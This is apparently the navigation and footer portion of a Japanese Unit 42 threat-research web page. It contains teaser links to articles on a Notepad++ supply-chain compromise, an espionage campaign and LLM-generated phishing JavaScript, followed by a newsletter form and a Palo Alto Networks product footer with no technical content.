  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/ "脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム")  
  ![Pictorial representation of Notepad++ supply chain compromise. A digital rendering of Earth from space, focusing on North and South America. The continents are illuminated in blue, with red lines and dots indicating data connections across various locations. Dark background highlights the vibrant network representation.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/11_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月11日 [#### 国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/)

* [Backdoor](https://unit42.paloaltonetworks.com/ja/tag/backdoor-ja/ "backdoor")

* [Cobalt Strike](https://unit42.paloaltonetworks.com/ja/tag/cobalt-strike-ja/ "Cobalt Strike")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/ "国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用")  
  ![Pictorial representation of the shadow campaigns. Digital graphic showing a networked globe with various data points and connectivity lines, symbolizing global digital communication and information technology.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/03_Nation-State-cyberattacks_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年2月5日 [#### Shadow Campaigns（シャドウ・キャンペーン）：世界規模のサイバースパイ活動の実態を暴く](https://unit42.paloaltonetworks.com/ja/shadow-campaigns-uncovering-global-espionage/)

* [Espionage](https://unit42.paloaltonetworks.com/ja/tag/espionage-ja/ "Espionage")

* [Government](https://unit42.paloaltonetworks.com/ja/tag/government-ja/ "Government")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/shadow-campaigns-uncovering-global-espionage/ "Shadow Campaigns（シャドウ・キャンペーン）：世界規模のサイバースパイ活動の実態を暴く")  
  ![Pictorial representation of runtime assembly attacks. Digital artwork of a glowing, futuristic shield disintegrating into small particles, set against a dark blue, bokeh-effect background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/09_Business_email_compromise_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月22日 [#### ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/)

* [API](https://unit42.paloaltonetworks.com/ja/tag/api-ja/ "API")

* [Google](https://unit42.paloaltonetworks.com/ja/tag/google-ja/ "Google")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/ "ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

* [脅威インテリジェンスについて](https://www.paloaltonetworks.jp/unit42/threat-intelligence-partners)  
  会社名

* [パロアルトネットワークスについて](https://www.paloaltonetworks.jp/about-us)

* [採用情報](https://jobs.paloaltonetworks.com/en/)

* [お問合せ](https://www.paloaltonetworks.jp/company/contact-sales)

* [企業責任](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [お客様向け](https://www.paloaltonetworks.jp/customers)

* [IR](https://investors.paloaltonetworks.com/)

* [拠点](https://www.paloaltonetworks.com/about-us/locations)

* [ニュースルーム](https://www.paloaltonetworks.jp/company/newsroom)  
  人気のあるリンク

* [ブログ](https://www.paloaltonetworks.com/blog/?lang=ja)

* [コミュニティ](https://www.paloaltonetworks.com/communities)

* [コンテンツライブラリ](https://www.paloaltonetworks.jp/resources)

* [Cyberpedia](https://www.paloaltonetworks.jp/cyberpedia)

* [イベントセンター](https://events.paloaltonetworks.com/)

* [電子メール設定の管理](https://start.paloaltonetworks.com/preference-center)

* [製品A〜Z](https://www.paloaltonetworks.jp/products/products-a-z)

* [製品認証](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [脆弱性の報告](https://www.paloaltonetworks.com/security-disclosure)

* [サイトマップ](https://www.paloaltonetworks.jp/sitemap)

* [テクニカル ドキュメント](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.jp/)

* [個人情報の販売および共有禁止](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [プライバシー](https://www.paloaltonetworks.jp/legal-notices/privacy)

* [トラスト センター](https://www.paloaltonetworks.jp/legal-notices/trust-center)

* [利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)

* [ドキュメント](https://www.paloaltonetworks.jp/legal-notices)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.jp/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* JP  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
